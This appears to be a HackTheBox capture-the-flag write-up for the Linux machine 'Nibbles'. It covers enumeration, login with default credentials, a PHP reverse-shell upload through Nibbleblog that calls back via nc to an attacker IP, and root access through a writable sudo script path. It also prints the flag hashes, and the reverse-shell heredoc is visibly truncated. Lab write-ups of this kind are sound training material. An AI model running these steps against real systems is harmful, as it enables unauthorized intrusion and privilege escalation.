Machine Information
- Platform: Linux
- Difficulty: Easy
- IP Address: 10.10.10.75
Initial Enumeration
Nmap Scan
attacker@kali
attacker@kali:~$
nmap -Pn -p- -sC -sV --min-rate 5000 10.10.10.75
Nmap Scan Results
Collapsible Output
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-13 17:26 EDT Nmap scan report for 10.10.10.75 Host is up (0.038s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA) | 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA) |_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site doesn't have a title (text/html). Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service Enumeration
Web Application
The main page shows a simple “Hello world!” message with nothing of interest. However, viewing the page source reveals a comment:
HTML Source Comment
<!-- /nibbleblog/ directory. Nothing interesting here! -->
Navigating to http://10.10.10.75/nibbleblog/ reveals a blog powered by Nibbleblog.
Directory Enumeration
attacker@kali
attacker@kali:~$
gobuster dir -u http://10.10.10.75/nibbleblog/ -w /usr/share/wordlists/dirb/common.txt -x html,php
Gobuster Directory Enumeration
Collapsible Output
=============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://10.10.10.75/nibbleblog/ [+] Threads: 30 [+] Wordlist: /usr/share/wordlists/dirb/common.txt [+] Status codes: 200,204,301,302,307,401,403 [+] Extensions: html,php =============================================================== http://10.10.10.75/nibbleblog/admin.php (Status: 200) http://10.10.10.75/nibbleblog/admin (Status: 301) http://10.10.10.75/nibbleblog/content (Status: 301) http://10.10.10.75/nibbleblog/index.php (Status: 200) http://10.10.10.75/nibbleblog/plugins (Status: 301) http://10.10.10.75/nibbleblog/themes (Status: 301) ===============================================================
The admin.php page is a login portal. After trying common credentials, admin:nibbles successfully authenticates.
Exploitation
Nibbleblog File Upload Vulnerability
Once logged in as admin, I navigated to Plugins → My Image which allows file uploads. Nibbleblog has a known vulnerability where arbitrary PHP files can be uploaded despite the “Images only” restriction.
Reference: Exploit-DB: Nibbleblog File Upload
Creating PHP Reverse Shell
attacker@kali
attacker@kali:~$
# Create simple PHP reverse shell
cat > shell.php << 'EOF'
&1|nc 10.10.14.5 4444 >/tmp/f");
?>
EOF
I uploaded shell.php through the My Image plugin interface. The file was uploaded successfully to:
/nibbleblog/content/private/plugins/my_image/image.php
Triggering the Shell
attacker@kali
attacker@kali:~$
# Start netcat listener
nc -nvlp 4444
Then navigate to: http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php
Reverse Shell Connection
$
listening on [any] 4444 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.75] 54832
/bin/sh: 0: can't access tty; job control turned off
$ whoami
nibbler
$ ls -la /home/nibbler
total 20
drwxr-xr-x 3 nibbler nibbler 4096 Dec 29 2017 .
drwxr-xr-x 3 root root 4096 Dec 10 2017 ..
-rw------- 1 nibbler nibbler 0 Dec 29 2017 .bash_history
drwxrwxr-x 2 nibbler nibbler 4096 Dec 10 2017 .nano
-r-------- 1 nibbler nibbler 1855 Dec 10 2017 personal.zip
-r-------- 1 nibbler nibbler 33 Dec 10 2017 user.txt
USER FLAG
HTB
b02ff32bb332deba49eeaed21152c8d8Post-Exploitation Enumeration
Shell
nibbler@nibbles
sudo -l
Sudo Permissions
$
Matching Defaults entries for nibbler on nibbles:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nibbler may run the following commands on nibbles:
(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
The user can run /home/nibbler/personal/stuff/monitor.sh as root without a password. This script doesn’t exist yet, giving us full control over what runs as root!
Privilege Escalation
Creating Malicious monitor.sh
Shell
nibbler@nibbles
# Unzip personal.zip (if it exists)
unzip personal.zip
# Create the directory structure
mkdir -p /home/nibbler/personal/stuff
# Create malicious monitor.sh
echo '#!/bin/bash' > /home/nibbler/personal/stuff/monitor.sh
echo '/bin/bash -i' >> /home/nibbler/personal/stuff/monitor.sh
# Make it executable
chmod +x /home/nibbler/personal/stuff/monitor.sh
# Execute with sudo
sudo /home/nibbler/personal/stuff/monitor.sh
Root Shell Obtained
$
root@nibbles:~# whoami
root
root@nibbles:~# id
uid=0(root) gid=0(root) groups=0(root)
ROOT FLAG
HTB
b6d745c0dfb6457c55591efc898ef88c
Why This Works
The sudo entry allows running
/home/nibbler/personal/stuff/monitor.sh as root, but the script doesn’t exist. Since the nibbler user owns the /home/nibbler/ directory, we can create the entire path structure and write our own malicious script that will execute as root.Loot
Credentials
Nibbleblog Admin Portal
Username:
adminPassword:
nibblesHost:
10.10.10.75Notes:
Weak default credentials
Key Takeaways
- HTML source comments can reveal hidden directories and sensitive information
- Nibbleblog’s file upload plugin doesn’t properly validate file types, allowing PHP upload
- Default/weak credentials like
admin:nibblesare still commonly found in CTF boxes and real systems - Sudo wildcards and missing files create privilege escalation opportunities - if you can create the file that sudo will execute, you control what runs as root
- Always check for zip files or archives in user home directories - they may contain useful information or scripts